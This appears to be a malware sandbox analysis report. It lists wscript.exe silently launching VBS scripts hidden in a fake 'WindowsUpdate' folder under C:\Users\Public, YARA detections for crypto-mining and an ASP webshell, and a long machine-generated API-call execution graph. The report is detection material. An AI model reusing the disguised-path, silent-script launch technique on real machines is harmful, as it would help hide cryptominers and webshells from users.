                                                                                                  Target ID:20
                                                                                                  Start time:17:28:54
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6da640000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Target ID:21
                                                                                                  Start time:17:28:54
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                                                                                                  Imagebase:0x7ff7c3fc0000
                                                                                                  File size:163840 bytes
                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Target ID:22
                                                                                                  Start time:17:29:00
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
                                                                                                  Imagebase:0x7ff7c3fc0000
                                                                                                  File size:163840 bytes
                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000016.00000002.880872368.000001959AF15000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                                                                  General

                                                                                                  Target ID:23
                                                                                                  Start time:17:29:01
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                                                                                                  Imagebase:0x7ff7c3fc0000
                                                                                                  File size:163840 bytes
                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: webshell_asp_sql, Description: ASP webshell giving SQL access. Might also be a dual use tool., Source: 00000017.00000003.880754735.000001E320A92000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp

                                                                                                  General

                                                                                                  Target ID:24
                                                                                                  Start time:17:29:08
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
                                                                                                  Imagebase:0x7ff7c3fc0000
                                                                                                  File size:163840 bytes
                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000018.00000002.898732843.000001DBC7705000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                                                                  General

                                                                                                  Target ID:25
                                                                                                  Start time:17:29:09
                                                                                                  Start date:06/06/2023
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                                                                                                  Imagebase:0x7ff7c3fc0000
                                                                                                  File size:163840 bytes
                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: webshell_asp_sql, Description: ASP webshell giving SQL access. Might also be a dual use tool., Source: 00000019.00000003.898659213.000001FFE094A000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: webshell_asp_sql, Description: ASP webshell giving SQL access. Might also be a dual use tool., Source: 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: webshell_asp_sql, Description: ASP webshell giving SQL access. Might also be a dual use tool., Source: 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:7.6%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:10.5%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:71
                                                                                                    execution_graph 40569 40b300 40570 40b304 40569->40570 40571 40b307 malloc 40569->40571 40575 3bff7a 40577 3bff7f 40575->40577 40576 3bff9e 40577->40576 40579 3ee551 40577->40579 40580 3ee55b __EH_prolog 40579->40580 40583 3ee590 40580->40583 40582 3ee571 40582->40577 40584 3ee59a __EH_prolog 40583->40584 40592 3eee93 40584->40592 40587 3eee93 4 API calls 40588 3ee5e0 40587->40588 40589 3ee67d 40588->40589 40600 3bc099 40588->40600 40606 40b3f3 VirtualAlloc 40588->40606 40589->40582 40593 3ee5d3 40592->40593 40594 3eeea6 40592->40594 40593->40587 40595 3eeeae _CxxThrowException 40594->40595 40596 3eeec3 40594->40596 40595->40596 40607 3b1e40 free 40596->40607 40598 3eeeca 40608 3b1e0c 40598->40608 40602 3bc0ac 40600->40602 40604 3bc2b6 40602->40604 40605 3bc258 memmove 40602->40605 40613 3bfd71 40602->40613 40618 3bfddf 40602->40618 40604->40589 40605->40602 40606->40589 40607->40598 40609 3b1e1c malloc 40608->40609 40610 3b1e15 40608->40610 40611 3b1e2a _CxxThrowException 40609->40611 40612 3b1e3e 40609->40612 40610->40609 40611->40612 40612->40593 40614 3bfd85 40613->40614 40615 3bfdb4 40614->40615 40623 3bae68 40614->40623 40642 3bc93f 40614->40642 40615->40602 40620 3bfdec 40618->40620 40619 3bfe16 40619->40602 40620->40619 40663 3f6ceb 40620->40663 40667 3f6d96 40620->40667 40631 3bae75 40623->40631 40624 3bb064 40646 3b7852 40624->40646 40627 3bb0aa GetLastError 40628 3baeaa 40627->40628 40628->40614 40629 3bb01b 40629->40628 40633 3bb039 memcpy 40629->40633 40630 3bafe7 40630->40624 40635 3b7407 5 API calls 40630->40635 40631->40624 40631->40628 40631->40629 40631->40630 40634 3bb011 40631->40634 40636 3bafad 40631->40636 40650 3b7407 40631->40650 40659 3b7825 ReadFile 40631->40659 40633->40628 40660 3bb0ec GetLastError 40634->40660 40639 3bb00d 40635->40639 40636->40631 40641 3bb0c7 40636->40641 40658 40b350 VirtualAlloc 40636->40658 40639->40624 40639->40634 40641->40628 40643 3bc963 40642->40643 40644 3bc982 40643->40644 40645 3bae68 10 API calls 40643->40645 40644->40614 40645->40644 40647 3b785f 40646->40647 40661 3b7825 ReadFile 40647->40661 40649 3b7870 40649->40627 40649->40628 40651 3b7432 SetFilePointer 40650->40651 40652 3b7416 40650->40652 40653 3b7456 GetLastError 40651->40653 40656 3b7477 40651->40656 40652->40651 40654 3b7462 40653->40654 40653->40656 40662 3b73ac SetFilePointer GetLastError 40654->40662 40656->40631 40657 3b746c SetLastError 40657->40656 40658->40636 40659->40631 40660->40628 40661->40649 40662->40657 40664 3f6cf5 40663->40664 40665 3f6d2a 40664->40665 40674 3c5d8c 40664->40674 40665->40620 40669 3f6da5 40667->40669 40668 3f6e7f 40668->40620 40669->40668 40672 3f6d5a 74 API calls 40669->40672 40718 3bb50c 40669->40718 40723 3f6ba9 40669->40723 40729 3f6d2e 74 API calls 40669->40729 40672->40669 40676 3c5d96 __EH_prolog 40674->40676 40677 3c5dac 40676->40677 40680 3c5bc1 40676->40680 40677->40665 40678 3c5e32 40678->40677 40679 3c5e9f SetFileSecurityW 40678->40679 40679->40677 40681 3c5bcb __EH_prolog 40680->40681 40693 3c30a2 40681->40693 40683 3c5c66 40696 3c54a8 40683->40696 40685 3c5be8 40685->40683 40687 3bfddf 74 API calls 40685->40687 40687->40683 40688 3c5d07 40688->40678 40689 3c5c8b 40690 3c5c9a 40689->40690 40691 3c5cff 40689->40691 40709 3b1e40 free 40690->40709 40708 3b1e40 free 40691->40708 40710 3b2d47 40693->40710 40697 3c54b2 __EH_prolog 40696->40697 40698 3c555e 40697->40698 40700 3c5594 40697->40700 40707 3c54c1 40697->40707 40714 3c5613 4 API calls 2 library calls 40697->40714 40698->40700 40715 3b2d10 malloc _CxxThrowException 40698->40715 40699 3c55dd 40717 3bb4f8 FindCloseChangeNotification 40699->40717 40700->40699 40713 3b7911 SetFileTime 40700->40713 40705 3c5576 40716 3b1e40 free 40705->40716 40707->40689 40708->40688 40709->40688 40711 3b1e0c ctype 2 API calls 40710->40711 40712 3b2d54 40711->40712 40712->40685 40713->40699 40714->40698 40715->40705 40716->40700 40717->40707 40730 3b7978 40718->40730 40721 3bb53d 40721->40669 40724 3f6bb3 __EH_prolog 40723->40724 40738 3c4f01 40724->40738 40725 3f6c2e 40726 3f6c34 40725->40726 40765 3c5416 40725->40765 40726->40669 40729->40669 40732 3b7985 40730->40732 40733 3b79b1 40732->40733 40735 3b793e 40732->40735 40733->40721 40734 3bb0ec GetLastError 40733->40734 40734->40721 40736 3b794f WriteFile 40735->40736 40737 3b794c 40735->40737 40736->40732 40737->40736 40741 3c4f0b __EH_prolog 40738->40741 40739 3c5023 40743 3b92c9 VariantClear 40739->40743 40740 3c5046 40769 3b92c9 40740->40769 40741->40739 40741->40740 40758 3c5041 40741->40758 40743->40758 40744 3c51da 40745 3c529a 40744->40745 40746 3c51e3 40744->40746 40751 3c52b4 40745->40751 40752 3c5350 40745->40752 40745->40758 40749 3b1e0c ctype 2 API calls 40746->40749 40753 3c51f2 40746->40753 40749->40753 40750 3c50d6 40750->40744 40750->40758 40852 3c6498 free memmove ctype 40750->40852 40755 3b1e0c ctype 2 API calls 40751->40755 40773 3c47f0 40752->40773 40853 3d234e 40753->40853 40754 3c5267 40866 3b1e40 free 40754->40866 40755->40758 40756 3c5067 40756->40750 40756->40758 40851 3b4268 CharUpperW 40756->40851 40758->40725 40759 3c5258 40865 3b3128 malloc _CxxThrowException free _CxxThrowException 40759->40865 40766 3c5420 __EH_prolog 40765->40766 40767 3c5436 40766->40767 41125 3e4912 EnterCriticalSection 40766->41125 40767->40726 40770 3b92f1 40769->40770 40772 3b92d1 40769->40772 40770->40756 40771 3b92ea VariantClear 40771->40770 40772->40770 40772->40771 40774 3c47fa __EH_prolog 40773->40774 40867 3c40c6 40774->40867 40776 3c480d 40820 3c4a1d 40776->40820 40876 3c4236 40776->40876 40779 3d234e 5 API calls 40780 3c4857 40779->40780 40781 3c4866 40780->40781 40958 3c43c7 15 API calls 2 library calls 40780->40958 40893 3b2e5f 40781->40893 40784 3c4872 40787 3c48b0 40784->40787 40959 3c4e1d 4 API calls 2 library calls 40784->40959 40820->40758 40851->40756 40852->40744 40854 3d2358 __EH_prolog 40853->40854 40855 3b2d47 2 API calls 40854->40855 40861 3d236e 40855->40861 40856 3d239a 40857 3b2e5f 2 API calls 40856->40857 40859 3d23a6 40857->40859 41122 3b1e40 free 40859->41122 40861->40856 41123 3b1089 malloc _CxxThrowException free _CxxThrowException 40861->41123 41124 3b3128 malloc _CxxThrowException free _CxxThrowException 40861->41124 40863 3c522f 40863->40754 40863->40759 40864 3b1089 malloc _CxxThrowException free _CxxThrowException 40863->40864 40864->40759 40865->40754 40866->40758 40868 3c40d0 __EH_prolog 40867->40868 40870 3b92c9 VariantClear 40868->40870 40871 3c410d 40868->40871 40869 3b92c9 VariantClear 40875 3c416d 40869->40875 40873 3c412e 40870->40873 40871->40869 40872 3c4178 40874 3b92c9 VariantClear 40872->40874 40873->40871 40873->40872 40874->40875 40875->40776 40877 3c4240 __EH_prolog 40876->40877 40878 3c4320 40877->40878 40879 3b2e5f 2 API calls 40877->40879 40878->40779 40880 3c429c 40879->40880 40881 3c42cb 40880->40881 40882 3c42b3 40880->40882 40883 3c42ba 40881->40883 40982 3b4a64 wcscmp 40881->40982 40981 3c644f 5 API calls 2 library calls 40882->40981 40886 3c430d 40883->40886 40984 3b1089 malloc _CxxThrowException free _CxxThrowException 40883->40984 40985 3b3128 malloc _CxxThrowException free _CxxThrowException 40886->40985 40887 3c42d8 40887->40883 40983 3c644f 5 API calls 2 library calls 40887->40983 40890 3c4318 40986 3b1e40 free 40890->40986 40987 3b2ae9 40893->40987 40958->40781 40981->40883 40982->40887 40983->40883 40984->40886 40985->40890 40986->40878 40988 3b1e0c ctype malloc _CxxThrowException 40987->40988 40989 3b2afe 40988->40989 40989->40784 41122->40863 41123->40861 41124->40861 41153 3b2ecb 41125->41153 41128 3e4ad8 41134 3e4add LeaveCriticalSection 41128->41134 41130 3e4a6c 41130->41128 41131 3e4ad0 41130->41131 41205 3b2711 malloc _CxxThrowException free ctype 41130->41205 41159 3eb734 41131->41159 41134->40767 41137 3e49ad 41139 3e49b9 fputs 41137->41139 41138 3e4ac1 41138->41131 41144 3b2ecb 3 API calls 41138->41144 41140 3e4a1d 41139->41140 41141 3e49e2 41139->41141 41198 3b2010 41140->41198 41142 3b2ecb 3 API calls 41141->41142 41145 3e49ec 41142->41145 41144->41131 41145->41140 41197 3b1089 malloc _CxxThrowException free _CxxThrowException 41145->41197 41146 3e4a30 41147 3e4a36 fputs 41146->41147 41148 3e4a61 41146->41148 41201 3b2201 41147->41201 41204 3b1fa0 fputc 41148->41204 41151 3e4a56 fputs 41151->41148 41154 3b2edd 41153->41154 41155 3b2f01 41154->41155 41156 3b1e0c ctype 2 API calls 41154->41156 41155->41130 41192 3e4af9 41155->41192 41157 3b2ef7 41156->41157 41206 3b1e40 free 41157->41206 41160 3eb749 GetTickCount 41159->41160 41161 3eb752 41159->41161 41160->41161 41170 3eb790 41161->41170 41181 3eb97c 41161->41181 41225 3b29f4 strcmp 41161->41225 41165 3eb7f1 41165->41181 41213 3b276e 41165->41213 41166 3eb77e 41166->41170 41226 3b3485 wcscmp 41166->41226 41170->41181 41207 3eb68d 41170->41207 41171 3eb844 41176 3b2f2f 3 API calls 41171->41176 41186 3eb933 41171->41186 41172 3eb805 41173 3eb82d 41172->41173 41228 3b284c 41172->41228 41173->41171 41232 3b28a5 malloc _CxxThrowException free memcpy _CxxThrowException 41173->41232 41178 3eb871 41176->41178 41233 3b2033 41178->41233 41181->41128 41186->41181 41219 3eb5fa 41186->41219 41193 3e499d 41192->41193 41194 3e4b03 41192->41194 41196 3b2711 malloc _CxxThrowException free ctype 41193->41196 41194->41193 41195 3eb5fa ctype 5 API calls 41194->41195 41195->41193 41196->41137 41197->41140 41199 3b2033 5 API calls 41198->41199 41200 3b2022 fputs 41199->41200 41200->41146 41202 3b18fb 41201->41202 41203 3b2218 fputs 41202->41203 41203->41151 41204->41130 41205->41138 41206->41155 41209 3eb6af __aulldiv 41207->41209 41208 3eb6f6 strlen 41210 3eb714 41208->41210 41209->41208 41211 3b284c malloc _CxxThrowException free memcpy _CxxThrowException 41210->41211 41212 3eb72f 41211->41212 41212->41165 41227 3b29f4 strcmp 41212->41227 41214 3b277a 41213->41214 41216 3b2796 41213->41216 41215 3b1e0c ctype malloc _CxxThrowException 41214->41215 41214->41216 41217 3b278d 41215->41217 41216->41172 41218 3b1e40 ctype free 41217->41218 41218->41216 41220 3eb60d 41219->41220 41224 3eb66c 41219->41224 41225->41166 41226->41170 41227->41165 41229 3b285b 41228->41229 41229->41229 41230 3b2632 malloc _CxxThrowException free memcpy _CxxThrowException 41229->41230 41231 3b286a 41230->41231 41231->41173 41232->41171 41240 3ef0bd 41245 3ef0d9 41240->41245 41243 3ef0d2 41246 3ef0e3 __EH_prolog 41245->41246 41258 3eef73 41246->41258 41252 3ef11c 41271 3b1e40 free 41252->41271 41254 3ef124 ctype 41272 3eed9a 41254->41272 41257 3b1e40 free 41257->41243 41262 3eef7d __EH_prolog 41258->41262 41260 3eefba 41264 3eef1d 41260->41264 41261 3eefb2 41278 3b1e40 free 41261->41278 41262->41261 41279 3b1e40 free 41262->41279 41268 3eef27 __EH_prolog 41264->41268 41265 3eef5c 41280 3b1e40 free 41265->41280 41267 3eef64 41270 3b1e40 free 41267->41270 41268->41265 41281 3b1e40 free 41268->41281 41270->41252 41271->41254 41273 3eeda4 __EH_prolog 41272->41273 41282 3b1e40 free 41273->41282 41275 3eedb7 41283 3b1e40 free 41275->41283 41277 3eedbf 41277->41243 41277->41257 41278->41260 41279->41262 41280->41267 41281->41268 41282->41275 41283->41277 41284 3d85ba 41285 3d85c4 __EH_prolog 41284->41285 41288 3d864f 41285->41288 41287 3d85d9 41289 3d8659 __EH_prolog 41288->41289 41292 3feeb2 41289->41292 41290 3d8670 41290->41287 41293 3fef1f 41292->41293 41294 3feec4 41292->41294 41293->41290 41295 3fef28 _CxxThrowException 41294->41295 41296 3feed8 41294->41296 41297 3fef47 __EH_prolog 41295->41297 41298 3fef00 memcpy 41296->41298 41299 3feef8 41296->41299 41300 3feee3 _CxxThrowException 41296->41300 41301 3b1e0c ctype 2 API calls 41297->41301 41298->41293 41299->41298 41300->41299 41302 3fef52 41301->41302 41303 3fef66 41302->41303 41305 3f7c24 41302->41305 41303->41290 41306 3f7c2e __EH_prolog 41305->41306 41311 3f7cd8 41306->41311 41308 3f7c5e 41309 3b2d47 2 API calls 41308->41309 41310 3f7c85 41309->41310 41310->41303 41312 3f7ce2 __EH_prolog 41311->41312 41315 3f1b11 41312->41315 41314 3f7cee 41314->41308 41316 3f1b1b __EH_prolog 41315->41316 41321 3ef5a9 41316->41321 41318 3f1b27 41325 3ccbdd malloc _CxxThrowException __EH_prolog 41318->41325 41320 3f1b3d 41320->41314 41322 3ef5b7 41321->41322 41326 3b9809 GetModuleHandleA 41322->41326 41324 3ef5e6 __aulldiv 41324->41318 41325->41320 41327 3b983a 41326->41327 41328 3b9869 GlobalMemoryStatus 41327->41328 41329 3b983e GlobalMemoryStatusEx 41327->41329 41330 3b9882 41328->41330 41329->41328 41331 3b9848 41329->41331 41330->41331 41331->41324 41332 3bfc71 41335 3bb15a 41332->41335 41336 3bb169 41335->41336 41337 3bb17d 41335->41337 41336->41337 41338 3b7407 5 API calls 41336->41338 41339 3bb1ee 41338->41339 41339->41337 41341 3bb0ec GetLastError 41339->41341 41341->41337 41342 3ee775 41349 3c7551 41342->41349 41345 3c7551 5 API calls 41346 3ee7a8 41345->41346 41355 3ef028 41346->41355 41348 3ee7bf 41350 3c755e 41349->41350 41351 3c7592 41349->41351 41352 3c7567 _CxxThrowException 41350->41352 41353 3c757c 41350->41353 41351->41345 41352->41353 41361 3c75f8 malloc _CxxThrowException free memcpy ctype 41353->41361 41356 3ef032 __EH_prolog 41355->41356 41362 3ef23f 41356->41362 41359 3b1e0c ctype 2 API calls 41360 3ef045 41359->41360 41360->41348 41361->41351 41363 3ef24c 41362->41363 41364 3ef03b 41362->41364 41365 3ef26a 41363->41365 41366 3ef255 _CxxThrowException 41363->41366 41364->41359 41368 3d0c7f malloc _CxxThrowException free memcpy ctype 41365->41368 41366->41365 41368->41364 41369 3e4232 41370 3b2f2f 3 API calls 41369->41370 41371 3e4271 41370->41371 41372 3eb734 16 API calls 41371->41372 41373 3e4278 41372->41373 41374 3c06f0 41375 3c06fa __EH_prolog 41374->41375 41423 3b13f5 41375->41423 41378 3c0744 6 API calls 41381 3c079f 41378->41381 41380 3c0736 _CxxThrowException 41380->41378 41382 3b276e 3 API calls 41381->41382 41387 3c080a 41381->41387 41383 3c07fe 41382->41383 41441 3b1e40 free 41383->41441 41385 3c089b 41437 3c0acb 41385->41437 41387->41385 41442 3d097c 5 API calls __EH_prolog 41387->41442 41390 3c08c4 _CxxThrowException 41390->41385 41424 3b13ff __EH_prolog 41423->41424 41443 3d6b24 41424->41443 41427 3b1438 41428 3b1e0c ctype 2 API calls 41427->41428 41431 3b144d 41428->41431 41430 3ef23f 5 API calls 41430->41431 41431->41430 41434 3b1507 41431->41434 41436 3b14f4 41431->41436 41448 3b1265 5 API calls 2 library calls 41431->41448 41449 3b1524 41431->41449 41435 3b2f2f 3 API calls 41434->41435 41435->41436 41436->41378 41440 3d097c 5 API calls __EH_prolog 41436->41440 41455 3b8fe9 GetCurrentProcess OpenProcessToken 41437->41455 41440->41380 41441->41387 41442->41390 41444 3b142b 41443->41444 41446 3d6b2f 41443->41446 41444->41427 41447 3b1212 free ctype 41444->41447 41445 3b1e40 free ctype 41445->41446 41446->41444 41446->41445 41447->41427 41448->41431 41450 3b152e __EH_prolog 41449->41450 41451 3b1e0c ctype 2 API calls 41450->41451 41452 3b1539 41451->41452 41453 3b154f 41452->41453 41454 3b2e5f 2 API calls 41452->41454 41453->41431 41454->41453 41456 3b9010 LookupPrivilegeValueW 41455->41456 41459 3b9066 41455->41459 41457 3b9058 41456->41457 41458 3b9022 AdjustTokenPrivileges 41456->41458 41461 3b905b FindCloseChangeNotification 41457->41461 41458->41457 41460 3b9048 GetLastError 41458->41460 41460->41461 41461->41459 41462 3b77f6 41465 3b7788 41462->41465 41466 3b779b 41465->41466 41473 3b7270 41466->41473 41469 3b77d9 41487 3b75ef 41469->41487 41470 3b77c1 SetFileTime 41470->41469 41474 3b727a __EH_prolog 41473->41474 41503 3b7322 41474->41503 41476 3b7285 41477 3b72aa CreateFileW 41476->41477 41478 3b72bf 41476->41478 41486 3b7308 41476->41486 41477->41478 41479 3b2d47 2 API calls 41478->41479 41478->41486 41480 3b72d1 41479->41480 41506 3b8820 41480->41506 41482 3b72e7 41483 3b72eb CreateFileW 41482->41483 41484 3b7300 41482->41484 41483->41484 41511 3b1e40 free 41484->41511 41486->41469 41486->41470 41488 3b7782 41487->41488 41489 3b7612 41487->41489 41489->41488 41490 3b761b DeviceIoControl 41489->41490 41491 3b763f 41490->41491 41492 3b76bc 41490->41492 41491->41492 41499 3b767d 41491->41499 41493 3b76c5 DeviceIoControl 41492->41493 41496 3b76ea 41492->41496 41494 3b76f8 DeviceIoControl 41493->41494 41493->41496 41495 3b771a DeviceIoControl 41494->41495 41494->41496 41495->41496 41496->41488 41634 3b74e3 8 API calls 41496->41634 41498 3b777b 41500 3b74b4 5 API calls 41498->41500 41633 3b8f28 GetModuleHandleW GetDiskFreeSpaceW 41499->41633 41500->41488 41502 3b76a6 41502->41492 41504 3b7337 41503->41504 41505 3b732c FindCloseChangeNotification 41503->41505 41504->41476 41505->41504 41512 3b8856 41506->41512 41508 3b8844 41508->41482 41510 3b2ecb 3 API calls 41510->41508 41511->41486 41513 3b8860 __EH_prolog 41512->41513 41514 3b8951 41513->41514 41522 3b88b7 41513->41522 41546 3b882b 41513->41546 41515 3b89f9 41514->41515 41517 3b8965 41514->41517 41516 3b8b60 41515->41516 41518 3b8a11 41515->41518 41519 3b2d8a 2 API calls 41516->41519 41517->41518 41525 3b8974 41517->41525 41521 3b2d47 2 API calls 41518->41521 41520 3b8b6c 41519->41520 41529 3b2d8a 2 API calls 41520->41529 41524 3b8a19 41521->41524 41522->41546 41599 3b2d8a 41522->41599 41613 3b601d 6 API calls 2 library calls 41524->41613 41527 3b2d8a 2 API calls 41525->41527 41541 3b897d 41527->41541 41528 3b88db 41533 3b88fa 41528->41533 41534 3b88ed 41528->41534 41531 3b8b8e 41529->41531 41530 3b8a28 41532 3b8a2c 41530->41532 41614 3b8274 malloc _CxxThrowException free _CxxThrowException 41530->41614 41625 3b8c2d memmove 41531->41625 41624 3b1e40 free 41532->41624 41539 3b2d8a 2 API calls 41533->41539 41603 3b1e40 free 41534->41603 41538 3b8b9a 41543 3b8b9e 41538->41543 41544 3b8bb4 41538->41544 41545 3b890b 41539->41545 41542 3b2d8a 2 API calls 41541->41542 41547 3b89a6 41542->41547 41626 3b1e40 free 41543->41626 41628 3b3164 malloc _CxxThrowException free _CxxThrowException 41544->41628 41604 3b8c2d memmove 41545->41604 41546->41508 41546->41510 41608 3b8c2d memmove 41547->41608 41552 3b8ba6 41627 3b1e40 free 41552->41627 41553 3b8917 41557 3b8941 41553->41557 41605 3b3128 malloc _CxxThrowException free _CxxThrowException 41553->41605 41554 3b8bc1 41629 3b3128 malloc _CxxThrowException free _CxxThrowException 41554->41629 41555 3b89b2 41560 3b89e9 41555->41560 41609 3b3164 malloc _CxxThrowException free _CxxThrowException 41555->41609 41607 3b1e40 free 41557->41607 41612 3b1e40 free 41560->41612 41561 3b8bdc 41630 3b3128 malloc _CxxThrowException free _CxxThrowException 41561->41630 41562 3b8949 41632 3b1e40 free 41562->41632 41566 3b8936 41606 3b3128 malloc _CxxThrowException free _CxxThrowException 41566->41606 41568 3b89c3 41610 3b3128 malloc _CxxThrowException free _CxxThrowException 41568->41610 41569 3b2d47 2 API calls 41573 3b8ab5 41569->41573 41571 3b8be7 41631 3b1e40 free 41571->41631 41574 3b8ae4 41573->41574 41578 3b8ac7 41573->41578 41579 3b2ecb 3 API calls 41574->41579 41576 3b8a3b 41576->41532 41576->41569 41615 3b30dc malloc _CxxThrowException free _CxxThrowException 41578->41615 41582 3b8ae2 41579->41582 41580 3b89de 41611 3b3128 malloc _CxxThrowException free _CxxThrowException 41580->41611 41617 3b8c2d memmove 41582->41617 41584 3b8ad9 41616 3b30dc malloc _CxxThrowException free _CxxThrowException 41584->41616 41587 3b8af8 41588 3b8afc 41587->41588 41589 3b8b11 41587->41589 41618 3b3164 malloc _CxxThrowException free _CxxThrowException 41587->41618 41623 3b1e40 free 41588->41623 41619 3b8c0a malloc _CxxThrowException 41589->41619 41593 3b8b1f 41620 3b3128 malloc _CxxThrowException free _CxxThrowException 41593->41620 41595 3b8b2c 41621 3b1e40 free 41595->41621 41597 3b8b38 41622 3b3128 malloc _CxxThrowException free _CxxThrowException 41597->41622 41600 3b2d9a 41599->41600 41601 3b2ae9 2 API calls 41600->41601 41602 3b2dad 41601->41602 41602->41528 41603->41546 41604->41553 41605->41566 41606->41557 41607->41562 41608->41555 41609->41568 41610->41580 41611->41560 41612->41562 41613->41530 41614->41576 41615->41584 41616->41582 41617->41587 41618->41589 41619->41593 41620->41595 41621->41597 41622->41588 41623->41532 41624->41546 41625->41538 41626->41552 41627->41546 41628->41554 41629->41561 41630->41571 41631->41562 41632->41546 41633->41502 41634->41498 41635 3f8e31 41636 3f8e3b __EH_prolog 41635->41636 41643 3fb2ce 41636->41643 41638 3f8eb8 41642 3f8ebf 41638->41642 41649 3fd39a 41638->41649 41640 3f8f2b 41640->41642 41655 3feb77 12 API calls 2 library calls 41640->41655 41644 3fb2de 41643->41644 41656 3bfce7 41644->41656 41648 3fb301 41648->41638 41650 3fd3a4 __EH_prolog 41649->41650 41672 3fcf5c 41650->41672 41653 3fd3db _CxxThrowException 41653->41640 41654 3fd412 41654->41640 41655->41642 41658 3bb15a 6 API calls 41656->41658 41657 3bfcff 41657->41648 41659 3fb02e 41657->41659 41658->41657 41660 3fb038 __EH_prolog 41659->41660 41669 3bfdbd 41660->41669 41662 3fb04f 41663 3fb0ad memcpy 41662->41663 41664 3fb098 _CxxThrowException 41662->41664 41665 3fb062 41662->41665 41667 3fb0c8 41663->41667 41664->41663 41665->41648 41666 3fb16c memmove 41666->41667 41667->41665 41667->41666 41668 3fb196 memcpy 41667->41668 41668->41665 41670 3bfd71 10 API calls 41669->41670 41671 3bfdd0 41670->41671 41671->41662 41673 3fcf66 __EH_prolog 41672->41673 41704 3f9057 41673->41704 41675 3fd178 41675->41653 41675->41654 41676 3fd227 41676->41675 41677 3fd24d 41676->41677 41680 3b1e0c ctype 2 API calls 41676->41680 41681 3bfdbd 10 API calls 41677->41681 41679 3bfdbd 10 API calls 41683 3fd07d 41679->41683 41680->41677 41682 3fd263 41681->41682 41686 3fd282 41682->41686 41696 3fd267 41682->41696 41737 3fade3 _CxxThrowException 41682->41737 41683->41675 41703 3bb15a 6 API calls 41683->41703 41711 3faec3 41686->41711 41743 3b1e40 free 41696->41743 41703->41676 41744 3f90dc 41704->41744 41706 3f908d 41751 3b1e40 free 41706->41751 41708 3f90a9 41752 3b1e40 free 41708->41752 41710 3f90bc 41710->41675 41710->41679 41710->41683 41712 3faedf 41711->41712 41737->41686 41743->41675 41753 3f9158 41744->41753 41747 3f90fe 41770 3b1e40 free 41747->41770 41750 3f9115 41750->41706 41751->41708 41752->41710 41772 3b1e40 free 41753->41772 41755 3f9168 41773 3b1e40 free 41755->41773 41757 3f917c 41774 3b1e40 free 41757->41774 41759 3f9187 41775 3b1e40 free 41759->41775 41761 3f9192 41776 3b1e40 free 41761->41776 41763 3f919d 41777 3b1e40 free 41763->41777 41765 3f91a8 41778 3b1e40 free 41765->41778 41767 3f91b3 41768 3f90e6 41767->41768 41779 3b1e40 free 41767->41779 41768->41747 41771 3b1e40 free 41768->41771 41770->41750 41771->41747 41772->41755 41773->41757 41774->41759 41775->41761 41776->41763 41777->41765 41778->41767 41779->41768 41955 40b413 VirtualFree 41956 3e8e2a 41957 3e8e37 41956->41957 41958 3e9191 41956->41958 41960 3e8e4a 41957->41960 41961 3e9045 41957->41961 41959 